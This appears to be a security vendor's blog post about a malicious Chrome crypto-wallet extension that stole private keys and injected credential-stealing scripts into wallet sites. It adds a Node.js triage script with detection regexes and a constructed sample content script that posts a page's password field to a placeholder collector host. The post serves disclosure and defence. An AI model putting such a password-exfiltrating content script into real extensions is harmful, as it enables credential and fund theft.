A Google Chrome extension named "Shitcoin Wallet" was caught stealing passwords and private keys.
"Shitcoin Wallet" (pardon our French, but that is the app's name; a "shitcoin" is a cryptocurrency of little value) is an app that lets users manage ETH and ERC20 tokens from within their browser. In addition to the Chrome extension, users can download a desktop app and control their funds outside the browser's more exposed environment.
The Chrome extension, launched on December 9th, 2019, has since been removed; however, the website remains live and the Windows app is still available for download there.
The extension was removed after it was found to contain malicious code with the following consequences:
- Funds managed directly from the extension are at risk: the extension sends the private data of every wallet created or managed through its interface to a third-party website.
- When users browse to popular cryptocurrency management websites, the extension injects malicious code into those pages, steals credentials and private keys, and sends them to the same third-party site.
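The two behaviours above (content scripts on third-party sites, plus secrets leaving the browser to a hard-coded foreign host) are the things to look for when triaging an unpacked extension. The following is an added example written for this page, not code from Guardio or from the extension itself. It reads a parsed manifest.json and the extension's script sources and flags broad match patterns and host permissions, scripts that read secrets from the page, and outbound calls to hosts other than the extension's own backend. The manifest, the scripts, and every hostname are constructed for illustration; no real collector site from the incident is known to this example.

```javascript
// Added example: static triage of an unpacked Chrome extension (run with Node.js).
// All sample data below is constructed; the ".invalid" hostnames are placeholders.

const BROAD_MATCHES = new Set(['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*']);

// Calls through which data typically leaves the page or the extension.
const EXFIL_CALLS = /\b(fetch|XMLHttpRequest|navigator\.sendBeacon|WebSocket)\b|\.src\s*=/;
// Reads of material a wallet page or a login form would consider secret.
const SECRET_READS = /type=["']?password|localStorage|sessionStorage|document\.cookie|privateKey|private_key|mnemonic/i;
const URL_RE = /https?:\/\/[^\s"'`)]+/g;

function hostOf(url) {
  try { return new URL(url).hostname; } catch { return null; }
}

// Returns a list of findings for an extension described by `manifest` (parsed
// manifest.json) and `sources` (file name -> JavaScript text). `ownHosts` is the
// set of hosts the extension legitimately talks to (assumed known to the analyst).
function triageExtension(manifest, sources, ownHosts) {
  const findings = [];

  // 1. Where do content scripts run? A wallet UI has no reason to inject
  //    scripts into third-party sites at all, let alone into every site.
  for (const cs of manifest.content_scripts || []) {
    for (const m of cs.matches || []) {
      findings.push({
        kind: BROAD_MATCHES.has(m) ? 'broad-content-script' : 'content-script',
        detail: m,
        files: cs.js || [],
      });
    }
  }

  // 2. Declared host access: `permissions` in Manifest V2, `host_permissions` in V3.
  const perms = [...(manifest.permissions || []), ...(manifest.host_permissions || [])];
  for (const p of perms) {
    if (BROAD_MATCHES.has(p)) findings.push({ kind: 'broad-host-permission', detail: p });
  }

  // 3. Per script: does it read secrets, does it send data, and to whom?
  for (const [file, src] of Object.entries(sources)) {
    const hosts = (src.match(URL_RE) || []).map(hostOf).filter(h => h && !ownHosts.has(h));
    const foreign = [...new Set(hosts)];
    const sends = EXFIL_CALLS.test(src);
    const readsSecrets = SECRET_READS.test(src);
    if (sends && foreign.length) {
      findings.push({ kind: 'exfil-to-foreign-host', file, detail: foreign.join(',') });
    }
    if (readsSecrets && sends) {
      findings.push({ kind: 'reads-secrets-and-sends', file });
    }
  }
  return findings;
}

// Constructed sample: a wallet extension whose content script runs everywhere
// and posts password fields to a host that is not the wallet's own backend.
const SAMPLE_MANIFEST = {
  manifest_version: 2,
  name: 'Example Wallet (constructed)',
  permissions: ['storage', '<all_urls>'],
  content_scripts: [{ matches: ['<all_urls>'], js: ['inject.js'] }],
};
const SAMPLE_SOURCES = {
  'inject.js': `
    const pw = document.querySelector('input[type="password"]');
    if (pw) fetch('https://collector.example.invalid/log', { method: 'POST', body: pw.value });
  `,
  'wallet.js': `
    fetch('https://api.example-wallet.invalid/balance');
  `,
};
const OWN_HOSTS = new Set(['api.example-wallet.invalid']);

function runSample() {
  return triageExtension(SAMPLE_MANIFEST, SAMPLE_SOURCES, OWN_HOSTS);
}

console.log(JSON.stringify(runSample(), null, 2));
```

On the sample the helper reports a content script matching every site, an `<all_urls>` host permission, and a script that both reads a password field and sends data to `collector.example.invalid`; the script that only talks to the declared backend is silent. These are triage signals, not proof: obfuscated or remotely loaded code will not show a literal URL, so a flagged extension still needs dynamic analysis of its network traffic.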
While Guardio blocks malicious sites like this one, our research team took a closer look at the site and wants to share some signs you should always watch for:
- Grammar/spelling: the section title should read "How it works" or "How does it work". Likewise, "ther're" is casual texting shorthand, not something you would expect from a reputable company.
- False links: not only is the text "which I will discuss further" oddly placed on a company page, but the box it appears in doesn't lead anywhere.
- Suspicious social media: a close look at Shitcoin's Twitter account shows followers that look like bots. The giveaway is the date they joined Twitter, December 2019 (when the app was launched), and the fact that the only content on their accounts is about the "Shitcoin" app.
But wait, there's more.
Guardio's research team also identified an earlier extension by the same people, "SAFU Wallet", which was exposed before "Shitcoin". Attackers like these tend to publish new apps with the same code and a different appearance each time one is taken down, so another attempt at a similar app is likely.
Rest assured that if you use Guardio as your browsing protection, we have removed this extension automatically and will warn you about malicious apps like it.